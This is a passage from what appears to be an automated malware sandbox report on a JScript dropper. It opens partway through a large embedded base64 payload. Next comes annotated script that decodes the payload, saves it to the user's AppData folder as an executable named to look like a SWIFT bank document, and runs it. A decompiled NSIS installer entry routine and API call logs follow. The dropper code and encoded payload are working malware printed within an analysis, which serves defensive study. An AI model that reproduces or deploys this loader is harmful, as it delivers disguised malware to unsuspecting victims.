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";
8	var silver = WScript.CreateObject ( "Microsoft.XMLDOM" );	Windows Script Host.CreateObject("Microsoft.XMLDOM") ➔
9	var sinema = silver.createElement ( "tmp" );	createElement("tmp") ➔
10	sinema.dataType = "bin.base64";
11	sinema.text = aso_ibora;
12	var sugar = WScript.CreateObject ( "ADODB.Stream" );	Windows Script Host.CreateObject("ADODB.Stream") ➔
13	sugar.Type = 1;
14	sugar.Open ( );	Open() ➔ undefined
15	sugar.Write ( sinema.nodeTypedValue );	Write() ➔ undefined
16	var wshShell = WScript.CreateObject ( "WScript.Shell" );	Windows Script Host.CreateObject("WScript.Shell") ➔
17	var tempdir = wshShell.ExpandEnvironmentStrings ( "%temp%" );	ExpandEnvironmentStrings("%temp%") ➔ "C:\Users\engineer\AppData\Local\Temp"
18	var appdatadir = wshShell.ExpandEnvironmentStrings ( "%appdata%" );	ExpandEnvironmentStrings("%appdata%") ➔ "C:\Users\engineer\AppData\Roaming"
19	var path = "SWIFT MO104978172_1301 EURO 9700.exe";
20	var is_temp = false;
21	if ( is_temp )
22	{
23	path = tempdir + "\\" + path;
24	}
25	else
26	{
27	path = appdatadir + "\\" + path;
28	}
29	sugar.SaveToFile ( path, 2 );	SaveToFile("C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe",2) ➔ undefined
30	if ( path.endsWith ( ".jar" ) )	"C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".jar") ➔ false
31	{
32	wshShell.run ( "java -jar \"" + path + "\"" );
33	}
34	else
35	if ( path.endsWith ( ".vbs" ) \|\| path.endsWith ( ".wsf" ) )	"C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".vbs") ➔ false "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".wsf") ➔ false
36	{
37	wshShell.run ( "wscript \"" + path + "\"" );
38	}
39	else
40	{
41	wshShell.run ( "\"" + path + "\"" );	run(""C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"") ➔ 0
42	}
43	}
44	catch ( err )
45	{
46	}

Reset < >

Analysis Process: SWIFT MO104978172_1301 EURO 9700.exePID: 3396, Parent PID: 5140COMMON

Execution Graph

Execution Coverage:	15.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1386
Total number of Limit Nodes:	22

Executed Functions

Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\engineer\\AppData\\Roaming";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\engineer\\AppData\\Roaming");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037b0
0x004037b6
0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d1
0x004037d8
0x004037da
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x00403911
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a88
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" ,00000020,"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" ,00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNELBASE(1033), ref: 00403982
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" ,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
